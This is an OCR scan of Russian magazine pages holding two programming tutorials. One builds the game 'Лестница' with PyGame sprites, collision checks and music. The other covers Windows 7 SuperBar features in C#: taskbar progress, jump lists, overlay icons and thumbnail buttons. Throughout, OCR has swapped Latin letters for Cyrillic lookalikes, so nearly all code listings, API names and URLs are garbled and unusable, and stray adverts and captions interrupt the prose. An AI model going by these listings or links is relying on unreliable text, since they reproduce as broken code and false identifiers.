между последними вызовами и следит, чтобы эта разница была равна 
1/30 секунды. Конечно, современные игры обычно имеют динами- 
ческий РР5, но это несколько сложнее в реализации, да и в аркадах 
бессмысленно. Посмотрим, как реализована первая локация: 



из одной функции главной поверхности. Функция Ыіі копирует на 
свою поверхность (передана в первом параметре), начиная с пози- 
ции, которая передается во втором параметре. Обработка событий 
реагирует лишь на нажатия < Еп1ег> , после чего выставит локацию 
игры кактекущую. Выбранная архитектура позволяет достаточно 
просто разбрасывать код в отдельные обособленные объекты. 
Локация Ехі1_Іоса1іоп сделана аналогично этой, и мы не будем ее 
рассматривать (изучай код на диске). Но переходить к (ЗатеЦосаБоп 
нам рановато. Мы еще ничего незнаемо сп райтах. 

СПРАЙТЫ 

Спрайт — графический объект в игре, который может перемещаться 
по игровому пространству. Это важнейшая деталь в 20-играх, хотя 
замечу, что и в 30 они также используются, например, при рисова- 
нии далеких объектов (при приближении они рисуются полигонами) 
и в процессе создания некоторых спецэффектов. То есть, спрайт 
— это объект, который содержит картинку или серию картинок (для 
анимации спрайта), координаты его нахождения и другие свойства, 
а также — логику движения спрайта и пр. В Рубате спрайты нужно 
наследовать от рудате.зргйе.Эргйе. Рассмотрим спрайт Камень: 

сіазз Катеп (рудате . зргіке . Зргіке) : зрееб = 1 

зкакиз = 0 # О-сІоші , 1-1еік , 2-гідЬЦ 

сіе! іпіС (зеИ) : 

рудаше. зргіке. ЗргіСе . іпік (зеИ) 

ішаде = рудате . ітаде . Іоасі ( 1 катеп . рпд ' ) . сопѵегк ( ) 
ітаде . зек_соіогкеу ( ітаде . дек_ак ((0,0)), КБЕАССЕЬ ) 
зеіі. ітаде = ітаде 
зеіі.геск = ітаде . дек_геск ( ) 
сіеі ирсіаке ( зеіі , агдз) : 

#тут логика движения камня, ее смотри в исходнике на диске 
зеіі.геск.х = петлХ 
зеіі.геск.у = петлУ 



+ + + + 
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сіазз 8кагк_1осакіоп (Ьосакіоп) : 

сіеі іпік (зеіі) : 

Ьосакіоп . іпік ( зеіі) 

зеіі . Ьаскдгошісі = рудате . ітаде . Іоасі ( 1 і .рпд ' ) 
сіеі сІгаѵЦ зеіі ) : 

зеіі .міпсІом.Ыік (зеіі . ЬаскдгоипЛ, (0, 0)) 
сіеі еѵепк (зеіі , еѵепк ) : 
іі еѵепк . куре == КЕУБОШГ: 
іі еѵепк.кеу == 13: 
депегаі . Іосакіоп = дате_1осакіоп 

В конструкторе вызывается функция рудате . ітаде . Іоасі ( 1 і . 
рпд 1 ) , которая считывает рисунок, переданный в параметре, и воз- 
вращает поверхность с ним. Реализация функции бгаѵѵтакже состоит 



Итак, объект содержит в себе некоторые переменные, необходи- 
мые нам для логики — а именно, скорость и направление движе- 
ния. Также здесь есть конструктор, подгружающий изображения. 
На процесс загрузки изображения придется обратить присталь- 
ное внимание — сначала мы загружаем картинку, а потом в ней, с 
помощью функции 5е1_со1огкеу, заменяем все пиксели, одинако- 
вые по цвету с пикселем из левого верхнего угла на прозрачный. 
Конечно, это выглядит несколько дико. На практике я советую ис- 
пользовать встроенную в рпд прозрачность, изменив сопѵегШ на 
сопѵег1_аІрІта(). Дело в том, что во время написания проги у меня 
не было денег на покупку лицензионного фотошопа :), поэтому 
картинки я рисовал в Ра і п 1 , а там прозрачности я не обнаружил. 
Красота спрайтов особенно проявляется при их количестве. Для 
их удобного объединения существует класс рудате.зргіІе.Сгоир. 
Создадим три камня: 
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ВСПОМИНАНИЯ АЛЕКСАНДРА ЛОЗОВСКОГО 

(ИЗ СТАТЬИ «ШАГ В ПРОШЛОЕ», 

I ЬЛр://ѵѵ\ллл/.хакер.ги/тада2Іпе/х5/064) 



В далеком 1989 годуя впервые увидел компьютер. Мне купили 
«Микрошу» — суперсоветскую ЭВМ, которая не может существо- 
вать без телевизора и магнитолы. На многократно зажеванной 
и разглаженной пленке кассеты МК60, помимо кучи полезных 
программ, были и игры, а среди них — та самая «Лестница». Идея 
ее проста: человечек идет снизу вверх по лабиринту (точнее, даже 
не по лабиринту, а просто по уровням, соединенным лестницами, 



причем игровое поле открывается взору полностью) . Наверху же 
игрового поля находится один (несколько) источников, из которых 
вываливаются скачущие камни. Камни (в виде символа «0») 
катятся вниз по уровням и лестницам, подпрыгивают и норовят 
раздавить игрока. Цель — долезть до верха. Уровней, причем 
самого разного дизайна, было куча. Я, к примеру, дошел до 14-го и 
нисколько не растерял игровой интерес :) . 



++++ ► 092 
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СКРИН ПЕРВОЙ ЛОКА- 
ЦИИ «ЛЕСТНИЦЫ» 




Ведшпіпд 



Сате 

Оеѵеіортепі 

««л РуМіоп алй Рудате 




катепз = рудате . зргііе . Сгоир ( ) 
іог і іп хгапде(0,3) : 
катепз . асМ ( Катеп ( ) ) 

Если нам нужно, чтобы камни немного продвинулись, 
вызовем катепз. ирсіаіеіагдз], и эта функция вызовет 
функцию ирсЫе для каждого спрайта из группы. Для 
прорисовки всех сп райтов существует функция бгаѵѵ, 

— она принимает параметр «поверхность», на которой 
нужно прорисовать сп райты: 

катепз . (Игам Ыіпсісж) 

Теперь мы готовы посмотреть на главную локацию — 
0ате_1оса1іоп, а точнее — на функцию бгаѵѵ: 

сіеі сІгаѵЩзеІі) : 

зеіі .міпсіом.ЪІіі (зеіі . ЪаскдгоипсЗ, (0, 0)) 

зеіі . коІоЬок . йгаы (зеіі . члгіпскж) 

зеі і . катепз . ирсіаіе ( ) 

зеіі . катепз . сігам ( зеіі .тпсісж) 

іог катеп іп рудате . зргііе . \ 

зргііесоііісіе ( зеіі . коіокок, зеіі. катепз, 0) : 
депегаі . Іосаііоп = ехіі_1осаііоп 

В начале этой функции на главную поверхность отобра- 
жается фоновое изображение, затем — рисуется спрайт 
колобка. Далее, в группе спрайтов «Камни», появляются 
движения, которые рисуются на экране. Наконец, по- 
следние две строчки наиболее интересны, ведь с помощью 
одной простой функции рудате. зргке.зргкесоШбеО мы 
проверяем, пересекся ли колобокс каким-то камнем. Эта 
функция возвращает булевы й список, и если произошло 
столкновение, то мы изменяем локацию на ехіЫосабоп. 

ОБРАБОТКА КЛАВИШ 

Сначала рассмотрим, какдвигается колобок, ведь он не 
принимает входящих событий о нажатии клавиш! Объект 
колобка использует функцию рудате. кеу.деІ_ргез5есІ(], 
которая возвращает булевый списокс состоянием нажатия 
каждой клавиши. Мы потом можем его проверить, используя 
константы. «Движущий» кусок кода колобка выглядиттак: 

кеуз = рудате . кеу . деі_ргеззесІ ( ) 

ІІ кеуз [К_ЬЕРТ] : 
зеіі.іеііО 
іі кеуз [К_КІСНТ] : 
зеіі . гідкі ( ) 
іі кеуз [К_ІІР] : 
зеіі . ир ( ) 
іі кеуз [К_БОШГ] : 
зеіі . 6 . 0 Ш 1 ( ) 

МУЗЫКА 

Игра без музыки — это не игра. Ктомуже, «поставить 



Т Н 



ПРОГРАММИРОВАНИЕ ИГР 

ѴѴІІ\ЮОѴѴ5 



ДЛИ 



СОВЕТЫ 

ПРОФЕССИОНАЛА 






ММ 5 



ЛУЧШАЯ КНИГАО ГЕЙМ-КОДИНГЕОТ АНДРЕЛАМОТА! 



пластиночку» можно очень просто: 

рудате .тіхег .тизіс . Іоасі ( ' з .трЗ ' ) 
рудате .тіхег.тизіс . ріау ( ) 

Эти функции загружают трЗ -фай л и начинают его 
проигрывание. Далее мы можем управлять процессом 
проигрывания. Например, пауза и снятие с паузы будут 
выглядеть так: 

іі еѵепі . іуре == КЕУІІР: 
і і еѵепі . кеу = = К_т : 
іі зеіі .тизіс : 

рудате .тіхег .тизіс .раизе ( ) 
зеіі .тизіс = 0 
еізе : 

рудате .тіхег .тизіс .ипраизе ( ) 
зеіі .тизіс = 1 




НТТР://ѴѴѴШ 



■ ■ 

> Ііпкз 

• ѵѵѵѵѵѵ.руаате.ога 

— сайт РуСате. 

• ѵѵѵѵѵѵ.репгіііа.пеі/ 
Іиіогіаіз/рѵіігоп/рудатѳ 

— несколько 
интересных 
туториалов 
по РуОате. 

• ѵѵѵѵѵѵ.руШоп.огд 

— сайт Руібоп’а. 



Кстати, музыка не будет играть, если в трЗ-шном файле 
есть теги второй версии. И это баг, а не фича. 

6АМЕ0ѴЕК 

На этом ознакомление с РуОате можно считать завер- 
шенным. Осталось лишь зайти на диск, найти там игру 
и поиграть в нее. Удачи тебе в создании собственных 
миров! тг 




> сіѵсі 

На диске смотри 
игруху со всеми ис- 
ходниками. 
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ИГОРЬ АНТОНОВ 

/ АЫТОЫОѴ.ІСОП.КНѴ@СМАІІ..СОМ / 




” 51ІРЕВВАКС00ІЫ6 

“ ПОДШОЮіШІТ 

Готовые решения для взаимодействия с новым таскбаром 



++++ Панель задач, носящая гордое название «ЗирегВаг» — не просто сим- 
патичная панелька в стиле Мае 08. Это абсолютно новый компонент 
++++ системы, способный выполнять кучу полезных функций. 



~~і — і 
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Еслиты планируешь всерьез заняться 
разработкой софта под новую ОС и хочешь, 
чтобы твои программы не выглядели белыми 
воронами в сравнении с конкурентами, — ты 
просто обязан разобраться и реализовать в 
них полную поддержку всех новых фишектаск- 
бара. Тем более, все эти штучки делают работу 
с приложением более комфортной и удобной. 

ЧТО НАМ ПОТРЕБУЕТСЯ 

Для знакомства с возможностями нового таск- 
баратебе понадобится ѴізиаІЗіисІ іо и библио- 



тека .МЕТ Іпіегор Батріе ЫЬгагу [ ЫТрѴ/сосІе. 
тзсІп.тісгозоІТ.сопп ). В эту л и бу входят уже 
известная Ѵізіа-разработчикам библиотека 
— Ѵізіа Вгібде — и многочисленные примеры 
демонстрирующие использование некото- 
рых новыхтехнологий ѴѴіпбоѵѵз 7 (ЗирегВаг, 
ЫЬгагуз, Зепзогапб І_осаі:іоп Ріа^огт и т.д. ) . 
Мы затронем лишь ЗирегВаг, но, если за- 
хочешьузнать подробнее о перечисленных 
технологиях, то намыль письмецо редактору 
рубрики и, возможно, в одном из ближайших 
номеров появится соответствующая статья. 



РК06КЕ55ВАК 
НА ПАНЕЛИ ЗАДАЧ 

Начинать наше знакомство с программиро- 
ванием ЗирегВаг мы будем с самого простого 
— с создания элегантного РгодгеззВаг. Ты, 
наверное, уже смогзаметить, что некоторые 
приложения (такие, как ІЕ8, Проводник] могут 
отображать ход выполнения какой-либо опе- 
рации прямо на панели задач. Такой подход 
оченьудобен и позволяетлишний раз недер- 
гаться и не разворачивать окно приложения с 
целью посмотреть, скопировался/закачался 
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ТИПИЧНЫЙ ПРИМЕР 
РР0ѲРЕ55ВАР 
НА ПАНЕЛИ ЗАДАЧ 



ли очередной файл или нет. Ктомуже, одним 
отображением процесса выполнения опера- 
ции дело не ограничивается. Например, ты 
без особого труда можешь проинформировать 
пользователя о неудаче или приостановке 
выполнения задачи — либо вовсе намекнуть 
на неизвестное количество времени, не- 
обходимого для завершения операции. Все 
это реализуется путем изменения состояния 
РгодгеззВаг. В общем, вариантов примене- 
ния этой возможности ЗирегВаг можно найти 
огромное множество, и сейчас мы рассмо- 
трим, как реализовать все на практике. 
Создавай в ѴізиаІЗіисІіо новый проект, под- 
ключи к нему скачанную библиотеку и добавь 
ссылки на компоненты интеграции с рабочим 
столом (Оезкіоріпіюдгаііоп]. На этом подготови- 
тельные работы окончены. Можно приступить 
непосредственно крассмотрению примера. 



Примеры прогреми нромнид 5црегВег || В ІРГЗЯІ 



РтодпеаВаг іаЬРад*2 




Состояніе РгодгехіВаг - 1*1 





ПРИМЕР ДЕМОНСТРАЦИИ 
РК06КЕ55ВАК В ДЕЙСТВИИ 

Для решения этой задачи потребует- 
ся воспользоваться услугами класса 
ѴѴіпсІоѵѵзЕогппЕхІепзіопз. Точнее, нас интере- 
суют всего лишь два метода: 

ЗекТазкЪагРгодгезз ( ) — метод по- 
зволяет указать процент выполнения 
операции 

ЗекТазкЪагРгодгеззЗкаке ( ) — метод 
отвечает за установку состояния 
РгодгеззВаг 

Кинь на форму своего проекта две кнопки, 
одну надпись и один компонент типа 
СотЬоВох.Для первой кнопки в свой- 
стве Техі: укажи «+», а для второй «-». Как 



СОЗДАНИЕТНІІМВВІЯТОЫ 

ргіѵаке ТкишЪВиккоп шуТкишЪВиккоп; 

ргіѵаке ТкитЪВиккопМападег туТкитЪВиккопМападег; 

ргокескесі оѵеггісіе ѵоісі ШсІРгос (гек Меззаде ш) 

{ 

ік (ш.Мзд == І^іцсіомаІТазкЬаг .ТазкЪагВиЪФопСгеакебМеззаде) 

{ 



ік (туТкитЪВиккопМападег == пиіі) 

{ 

туТкитЪВиккопМападег = МіпЪомзРогтзЕхкепзіопз . 
СгеакеТкитЪВиккопМападег (ккіз) ; 

} 

шуТкитЪВиккоп = туТкитЪВиккопМападег . СгеакеТкитЪВик коп ( 1 , 
ккіз.Ісоп, "Тезк"); 

шуТкишЬВиккоп . Сііскесі += Ъеіедаке 
{ 

Мез задеВох . Зком («Тезк Ьиккоп») ; 

} ; 



шуТкишЬВиккопМападег . АЪЪТкишЪВиккопз (шуТкишЬВиккоп) ; 

} 

ік (шуТкишЬВиккопМападег !=пи11) 

{ 

туТкитЪВиккопМападег . Бі зрак скМез заде ( гек ш) ; 

} 

Ъазе .МпЪРгос (гек ш) ; 



• Примеры программирования 5ирегВаг 
Ргодге»$Ваг іаЬРаде2 
Тип РгодгеззВаг 



. Енот 



МоппаІ 

Состояние РгодгеззВаг 

Рацее 
МоРлодгезз 
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ДЕМОНСТРАЦИЯ ЛІМРЬІЗТ У ІЕ8 



нетрудно догадаться, по нажатию первой 
пимпы мы будем сознательно увеличи- 
вать процент выполнения операции, а по 
нажатию второй — наоборот, уменьшать. 
Компонент СотЬоВ ох мы будем исполь- 
зовать для хранения списка возможных 

СОСТОЯНИЙ : 

• ІМогтаІ 

• Іпбеіегтіпаіе 

• Еггог 

• Раизе 

• ІЧоРгодгезз 

Пример моей формы ты можешь увидеть на 
рисунке. Теперь создавай обработчиксобытия 
Сііскесі для первой кнопки (та которая «+»] 
и пиши в нем две незамысловатые строчки 
кода: 

МпЬотлзРогтзЕхкепзіопз . 
ЗекТазкЬагРгодгезз (ккіз , 
кокаІРгодгезз) ; 

кокаІРгодгезз = кокаІРгодгезз + 10; 

Аналогичным образом создавай обработ- 
чиксобытия нажатия для второй кнопки и 
напиши в нем точно та кие же строчки, как 
и в первом случае, только «плюс» поменяй 
на «минус». Вот та к, с помощью всего лишь 
одной строчки кода мы добились отображе- 
ния РгодгеззВагдля нашего приложения 
на ЗирегВаг. Чтобы программа успешно 
запустилась, не забудь добавить патезрасе 
ѴѴіпбоѵѵзУ.ОезкІорІпІедгаІіоп, \Л/іпбоѵѵз7. 
ОезкІорІпІедгаІіоп.ѴѴіпбоѵѵзЕогппз и объявить 
приватную переменную ІоІаІРгодгезз. По- 
пробуй запустить приложение и поиграться 
скнопками.аятемвременем приступлю к 
рассмотрению статусов РгодгеззВаг. 

Какты помнишь, возможныетипы статусов 
мы забили в СотЬоВох. Вдохнем жизнь в наш 
список выбора! Создавай для него обработчик 
события Зеіескесі I псІехСЬапдесІ и напиши туда 
код из соответствующей врезки («Изменение 
статуса РгодгеззВаг»]. 

Код для установки состояния РгодгеззВаг 
затруднений вызвать не должен. По сути, 
весь листинг (я его привел не полно- 
стью) — это сплошной сазе и вызов метода 
ЗеіТазкЬагРгодгеззЗіаІеО. В качестве 
параметров я передаю методу хэндл формы и 
значение из перечисления ѴѴіпбоѵѵзУТазкЬаг. 
ТЬитЬпаіІРгодгеззЗіаІе, соответствующее 
определенному статусу. Результат работы мое- 
го примера ты можешь увидеть на рисунке 3. 
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ПОЛЕЗНЫЕ РЕСУРСЫ 

Ьнр://собе.тзбп.тісгозобцсот/ѴУіпс1оѵѵ5АРІСос1еРаск — альфа- 
версия библиотеки ѴѴіпсІоѵѵз АРІ СобеРаск. 

ЬЩ)://ѵ\плп/у.тісго50Й.сот/боѵт1оаб5 — отсюда можно стянуть 
официальный образ ѴѴіпсІоѵѵз 7 КС 5БК. В нем ты найдешь доку- 
ментацию, а также кучу примеров на неуправляемом коде. Очень 
рекомендую для изучения. 

Ьнр://ѵ\ллл/ѵ.і:есМаѵ5.гіі — на сайте собрано огромное количество 
официального видео по продуктам от М3. По ѴѴіпсІоѵѵз 7 есть до- 
статочно большое количество роликов. Причем, ролики несут в 
себе реальную пользу, а не пиар :) . 

Ьар: /ЛіаЪгаЬаЪг.ги — здесь всегда появляется новая и актуаль- 
ная информация обо всем, что связано с ІТ. ѴѴіпсІоѵѵз 7 не стала 
исключением. Есть как обзоры системы, так и посты касательно 
разработки приложений под новую ОС. 

Іптр : / /ѵг-опііпе . щ — в июльском номере электронного журнала 
ѴК-ОпИпе ты сможешь прочитать мою статью, посвященную опи- 
санию процесса взаимодействия с библиотеками ѴѴіпсІоѵѵз 7. 

ЬирУ/Ыо^з.ппсгозобЕсо.й/Ыо^з/зазЬа — хороший блог по техно- 
логиям М3. Очень много постов касательно программинга на С# 
и под ѴѴіпсІоѵѵз 7, в частности. Настроение портит лишь тот факт, 
что все посты на английском. 

Ьар://ѵ\плп/у.^штрі.сот/В1о^ — поищи тут набор компонент, с 
помощью которых ты сможешь реализовать описанные в статье 
приемы, используя в качестве среды разработки старый добрый 
БеІрЫ. 

СПИСКИ ПЕРЕХОДОВ 
НА ПРАКТИКЕ ШМРІ_І5Т) 

Другой очень заметной новинкой 5 и ре гВа г стали так называемые 
списки переходов. Они позволяютхранить списокзадач (функций), 
ассоциированных с приложением, ссылки на недавно открытые 
файлы и т.д. Если ты юзаешь ѴѴіпсІоѵѵз 7 в первый раз, то, чтобы по- 
знакомиться с функцией ЛитрЫзІ:, кликни правой клавишей мыши по 
какому-нибудь значку на таскбаре (например, по ІЕ8). В появившемся 
контекстном меню будут содержаться ссылки на основные функции 
программы — «Создать новое окно», «Приватный режим» и т.д. 

Плюсы такой «мен юшки» очевидны. Поюзав эту фичу с недельку, я к 
ней чертовски привык, и теперь во всех своих будущих проектах буду 
обязательно делать поддержку Л. Перед тем, как писать код, прого- 
ворим теоретические нюансы. Чтобы встроить в свое приложение под- 
держку списков перехода, нам необходимо создать экземпляр объекта 
ЛитрЕізіМападег. Нюанс в этой, казалось бы, простой операции всего 
один — инициализировать объект нужно в момент создания кнопки 
приложения на ЗирегВаг. Какэто сделать? Достаточно всего лишь 
переопределить метод ѴѴпбРгос. В нашем случае метод должен обраба- 
тывать сообщение ТазкЬагВиііопСгеаіесІМеззаде. При его возникнове- 
нии от настребуется воспользоваться методом СгеаіеЛ трЫзіМападег 
класса ѴѴіпсІоѵѵзЕогппЕхіепзіопз. Создав свой ЛитрЫзіМападег, можно 
начинать пить шампанское. По сути, первая часть работы выполнена. 



ИЗМЕНЕНИЕ СТАТУСА 

I РР 06 РЕ 55 ВАР 

іпС гезиІС = сошЬоВохІ . ЗеІесСесІІпсІех; 
зміСсЪ. (гезиІС) { 
сазе 0 : 

МіпбомзРогтзЕхСепзіопз . ЗеСТазкЬагРгодгеззЗСаСе ( 
іМз , 

Міпскжз 7 ТазкЬаг . ТІіиіпЬпаіІРгодгеззЗЦаСе .Ыогшаі ) ; 
Ьгеак; 
сазе 1 : 

МіпЬомзРогтзЕхСепзіопз . ЗеЦТазкЬагРгодгеззЗДаСе ( 
ЕЬіз , 

Мпс1омз7ТазкЬаг . ТкишЬпаіІРгодгеззЗкаСе . 
ІпЬеСегтіпаке) ; 

Ьгеак; 

} 

Далее следует «оформить» подписку на событие ІІзегРетоѵесікетз и 
приступать к созданию самих ссылок. Я тебе уже говорил, что ссылки 
могут быть несколькихтипов — недавние документы, просто ссылки 
на программы и т.д. Всвоемпримерея создаю так называемые «за- 
дачи» (делаю ссылку на программу «калькулятор»). За добавление 
очередной такой задачи отвечает метод АсІсІІІзегТазк объекта типа 
Л тризіМападег. В качестве одного единственного параметра методу 
требуется передать новый объекттипа БЬеНЫпк с заполненными 

ПОЛЯМИ: 

• РаЛ Путь к приложению/файла. 

• ТіЙе — заголовок пункта в списке перехода. 

• Саіедогу — группа. Все ссылки в Л могут быть разделены по группам. 

• ІсопЬосайоп — путь к иконке. 

• Ісопіпбех — индекс иконки в файле. 

На этом рассмотрение процесса создания задач в списке переходов 
можно считать оконченным. Переписывай содержимое второй врезки 
в свой проект и запускай приложение для теста. Обрати внимание, 
если ты создашь для своей программы иконку на таскбаре, Л по- 
является всегда, независимо оттого, запущено ли твое приложение 
или нет. Вполне возможно, что рано или позднотебе захочется в Л 
создать список недавно открытых в твоей программе файлов. Принцип 
остается тот же, за исключением используемого метода — вместо 
АсІсІІІзегТазк нужно будет использовать АЛТоПесеп!. 

ОВЕРЛЕЙНЫЕ ИКОНКИ 

МісгозоІТ в последней версии своей ОС пытается все делать так, чтобы 
пользователю жилосьуютно и комфортно. Взять хотя бы еще одну 
фишку ЗирегВаг — Оѵегіауісопз (оверлейные иконки). Пользователю 
эта функция предоставляет возможность узнать о состоянии прило- 
жения. Уверен, что к выходу семерки в свет производители программ- 
мессенджеров возьмут эту функцию на заметку, так как с ее помощью 
можно красиво отображатьтекущий статус (отошел, занят) прямо на 



АКАКЖЕ ОЕЬРНІ? 

Вполне возможно, что ты — родом из банды бывших дельфийцев, 
вынужденных в силу понятных причин перейти на Ѵізиаі Згисііо 
от корпорации зла. Но что, если у тебя есть проекты, требующие 
поддержки новой ОС и ее новых функций? Если твой ответ «да», 
то значит, эта врезка для тебя. Оапіеі ѴѴізсйпеѵѵзкі создал пакет 
компонент под названием «ѴѴіпсІоѵѵз 7 СоШгоН бог ОеІрЫ». С по- 
мощью компонент, входящих в этот набор, ты с легкостью сможешь 



встроить в свое приложение поддержку следующих функций: 

1. ЛитрЫзг. 

2. Оѵегіауісопз. 

3. Рго^геззВагІпсіісайоп. 

4. ТазкВагТЬитЬпаіІз. 

Неплохо? А если учесть, что все это хозяйство бесплатно — и без- 
глючно работает на БеІрЫ 7-2009, то просто замечательно! 
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ЗАГАДОЧНЫЕ ТНІІМВВІІТТ0М5 

панели задач. Чтобы лучше понять, о чем я говорю, не по- 
ленись и запусти стандартный М5Ы Меззапдег. Попробуй 
подключиться к серверу и выстави какой-нибудь статус. 
Как проделаешь это нехитрое действие — глянь на панель 
задач. Прямо на иконке мессенджера увидишь иконку, 
соответствующую текущему статусу. 

Благодаря классам, реализованным в библиотеке .ЫЕТ 
Іпіегор Батріе ЫЬгагу, встроить в свое приложение под- 
держку оверлейных иконокстановится совсем нетрудно, 
и скороты в этом убедишься. Итак, разберем весь процесс 
по шагам. Нам необходимо: 

1. Подготовить иконки. Можешь создать для этого отдель- 
ный файл ресурсов или просто воспользоваться компо- 
нентом ІтадеЫзІ;. 

2. Воспользоваться методом ЗеіТазкЬагОѵегІауІсоп. В 
качестве параметров он принимает: 

• НапсЛе формы. 

• Объект Ісоп. 

• Текст подсказки. 

3. Лицезреть готовый результат. 

На основании вышесказанного создаем новый проект. 
Кидаем на форму компонент ВиЛоп и определяем для 
кнопки обработчиксобытия СІіскесІ. В его тело пишем: 

ЖпОомзРоппзЕхДепзіопз . ЗекТазкЪагОѵегІауІсоп 
(Йііз , 

кіііз . Ісоп, "Му Оѵегіауісоп" ) ; 



I СОЗДАН И Е ЗАДАЧ И ДЛЯ 

ІЛІМРЫ5Т 

ргокескесі ЛишрЬізДМападег туЛишрЪізкМападег ; 
ргокескеЛ оѵеггіОе ѵоісі ШЛРгос (геТ Меззаде ш) 

{ 

Т (ш.Мзд == МіпЛомз7ТазкЪаг . ТазкЪагВиккопСгеакеЛМеззаде) 

{ 

шуЛишрЬізСМападег = МіпЛомзЕогтзЕхкепзіопз . 

СгеакеЛитрВізкМападег ( Йііз ) ; 
шуЛитрЫзСМападег . ІІзегКешоѵесіІІсешз += (о, е) => 

{ 

е . СапсеІСиггепкОрегакіоп = Таізе; 

} ; 



туЛитрЬізкМападег . АскШзегТазк (пем ЗЬ.е1ІЬіпк 
{ 

РакЬ. = Ракк . СотЪіпе ( 

Епѵігоптепк . ОекЕоІсІегРакк ( 

Епѵігоптепк . ЗресіаІЕоЮег . Зузкет) , 

"саіс . ехе" ) , 

Тікіе = "Саісиіаког " , 

Сакедогу = " Арріісакіоп» , 

ІсопЬосакіоп = Ракк . СотЪіпе ( 

Епѵігоптепк . ОекЕоІсІегРакк ( 

Епѵігоптепк . ЗресіаІЕоІсІег . Зузкет) , 

" саіс . ехе " ) , 

Ісопіпсіех = О 
}); 

туЛишрЫзкМападег . КеТгезк ( ) ; 

} 

Ьазе . МпсІРгос (гек ш) ; 



Так, создавать иконки мы научились. Рассмотрим об- 
ратный процесс — удаление созданной иконки. Бросай на 
форму еще одну кнопку и в обработчике ее нажатия пиши: 

МпЛомзЕогтпзЕхкепзіопз . ЗекТазкЪагОѵегіауІсоп ( 
ккіз , 

П11І1, 

Зкгіпд . Етрку ) ; 

На этом все. Можешь запускать приложение и потестить 
его. Мой результат показан на рисунке. Перед тем, как 



приступить кописанию следующей функции ТазкВаг, хочу 
подкинуть тебе одну идейку по практическому использо- 
ванию оверлейных иконок. Если немножко включить со- 
ображалку, то реально написать несколько строчектухлого 
кода и описать метод для динамического создания иконок. 
Что это дает? А возможность создавать красивые иконки с 
цифрами (или буквами)! 

Например, ты кодишь приложение, которое работаете 
сетью и принимает/отправляет файлы. Как можно сделать 
отображение процента выполнения загрузки вто время, 




> сіѵсі 

Сорцы, компоненты 
и прочие ништяки ты 
сможешь найти на 
нашем диске. 
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когда главное окно свернуто? Да, ты можешь поступить, как я говорил 
в самом начале статьи (сделать РгодгеззВаг], но куда прикольней (и 
симпатичней] решить эту задачу с помощью динамического генериро- 
вания иконок. Говоря проще, на каждый процентты должен создавать 
иконку, в которой в качестве изображения будет присутствовать нужная 
цифра. Код в рамках статьи я приводить не буду; если сам не справишь- 
ся (что вряд ли], то загляни в исходники моего проекта на нашем БѴБ. 

тнимввіято№ 

Наведи курсор грызуна на запущенный (и свернутый] проигрыватель 
ѴѴіпбоѵѵз Мебіа Ріауег и ты увидишь маленькое окошко с кнопками, 
позволяющими управлять состоянием проигрывания мультимедий- 
ного контента. У Мебіа Ріауег в этом окне доступны три кнопки — Ріау, 

N ехГ, Ргеѵіоиз. В своем приложении ты можешь не придерживаться 
таких ограничений и создать до семи кнопок. Больше создать, увы, 
не получится; это ограничение наложено самой ѴѴіпбоѵѵз. Ну, нельзя, 
так нельзя! Не будем расстраиваться по пустякам, а лучше попробуем 
создать приложение, демонстрирующее эту возможность. 

Как и следует ожидать, главным нашим помощником будетуже по- 
любившаяся библиотека. Создавай новый проект и вновь подключай 
к нему ѵізіабгібде и ѴѴіпбоѵѵз 7 БезкІорІпІедгаЦоп. Для этого примера 
нам не потребуются никакие элементы управления, поэтому смело 
переходи в редактор кода и потихонечку начинай перебивать содержи- 
мое врезки с говорящим названием. 

Все кнопки такого вида (ТбшпЬВиІТопз] создаются при по- 
мощи объекта -контейнера — ТЬитЬВиМопМападег и объекта 
ТЬитЬВібіоп. Именно поэтому в самом начале третьего ли- 
стинга я описываю два приватных поля — ітуТЬитЬВиІТоп и 
туТЬитЬВіЛІопМападег. Дальше от нас требуется переопреде- 
лить метод ѴѴпбРгос (вспомни, мы уже проделывали такой трюк] 
и сделать в нем проверку на сравнение очередного сообщения с 
ѴѴіпбоѵѵз УТазкЬаг.ТазкЬагВииопСгеаІебМеззаде. Если результат 
— истина, то нужно выполнить проверку на «созданность» экзем- 
пляра объекта ТЬитЬВиііопМападег. Далее действуем в зави- 
симости отситуации. В случаеуже проведенной инициализации 
переменной туТбитЬВиІТопМападег — пропускаем вызов метода 
СгеаІеТЬитЬВииопМападегП и переходим сразу к созданию кнопки. 
Каждая новая кнопка создается вызовом метода СгеаІеТбитЬВиІТопО 
объекта типа ТЬитЬВиІТопМападег. Для успешной отработки методу 
требуется передатьтри параметра: 



1. И — числовой идентификатор кнопки. Я не заморачиваюсь и передаю 1 . 
2.1соп — иконка для кнопки. В этом параметре я указываю бзіз.Ісоп, то 
есть, по сути, устанавливаю в качестве иконки, основную иконку на- 
шего приложения. 

3. ТооІТір — текст подсказки. 

Толку от безжизненной кнопки немного, а разтак, неплохо было бы 
забиндить обработчиксобытия СІіскеб. Для этого описываем делегат. 

В своем примере я просто вызываю метод ЗЬоѵѵ класса МеззадеВох. 
Говоря другими словами, при каждом нажатии на кнопкуу меня будет 
появляться окно с текстом «Тезі ЬиІТоп». 

После описания действия кнопки ее необходимо добавить в наш 
ТЬитЬВиІТопМападег. Эта процедура выполняется посредством вы- 
зова метода АббТЬитЬВиІТопз. Из параметров ему нужно передать 
объекттипа ТЬитЬВиІТоп. 

Можно считать, что пример полностью готов. Все, что остается: на- 
мекнуть ТЬшпЬ В иКопМа падет, что обрабатывать сообщения теперь 
— его прямая обязанность. Именно это я и делаю, вызвав метод 
ОізраІсЬМеззаде. 

На этом торжественном моменте третий листинг подошел к концу, и 
настало время переходить к разбору полетов. Попробуй запустить 
созданное приложение и подвести кего иконке курсор мыши. Если ты 
недопустил ошибок, то увидишь примернота кую же картинку, какна 
рисунке. 

5НІЯ00ѴѴМ 

Обычно принято ругать МісгозоіТ за кривизну продуктов и ухаха- 
тываться над допущенными «детскими» ошибками. Но я хотел бы, 
наоборот, похвалить за то, что еще до выхода финального релиза 
ѴѴіпбоѵѵз 7 у нас стобой есть возможность поюзать все новые фишки 
системы и реализовать их поддержку в своих программах. Библио- 
тека, которую мы стобой сегодня использовали — лишнее тому 
подтверждение. Кроме того, имеется еще и 5БК, который содержит 
кучу примеров и информации — фактически все, что только может по- 
требоваться ѴѴіпбоѵѵз-разработчику. Это реально круто, и я надеюсь, 
что в будущем компания будет придерживаться такого пути. Тебе, 
приятель, я хочу пожелать удачи в программировании. Ни в коем слу- 
чаенетеряйвремениине отставай от прогресса. Уже сейчас начинай 
готовить версию своих мега-проектов для ѴѴіпбоѵѵз 7. Тем более, для 
этого есть все необходимое. Если с чем-то не разберешься, — пиши 
